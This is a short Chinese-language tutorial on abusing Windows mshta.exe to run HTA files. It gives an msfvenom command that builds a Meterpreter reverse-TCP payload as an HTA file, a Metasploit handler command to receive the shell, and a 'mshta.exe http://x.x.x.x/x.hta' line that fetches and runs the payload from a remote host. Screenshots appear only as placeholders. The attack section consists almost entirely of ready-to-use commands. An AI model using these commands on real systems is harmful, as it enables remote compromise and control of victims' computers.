1. 概述

  1. Mshta.exe是微软Windows操作系统相关程序,英⽂全称Microsoft HTML

Application,可翻译为微软超⽂本标记语⾔应⽤,⽤于执⾏.HTA文件。 ⽬前正常的hta⽂件⽤到的很少,偶尔见到了很可能就是恶意软件,很多免杀⼯具都 是对shellcode进⾏处理后生产.hta⽂件,在windows下可以直接执行。

2. 利用

2.1 生成shellcode

  1. msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.4 lport=1234 -f hta-psh -o 1234.hta

image.png

2.2 监听

  1. handler -H 192.168.1.4 -P 1234 -p windows/meterpreter/reverse_tcp

image.png

2.3 执行上线

2.3.1 本地运行

直接运行就可以上线了
image.png

2.3.2 远程加载

远程加载的话直接使用mshta加载就可以了

  1. mshta.exe http://x.x.x.x/x.hta

image.png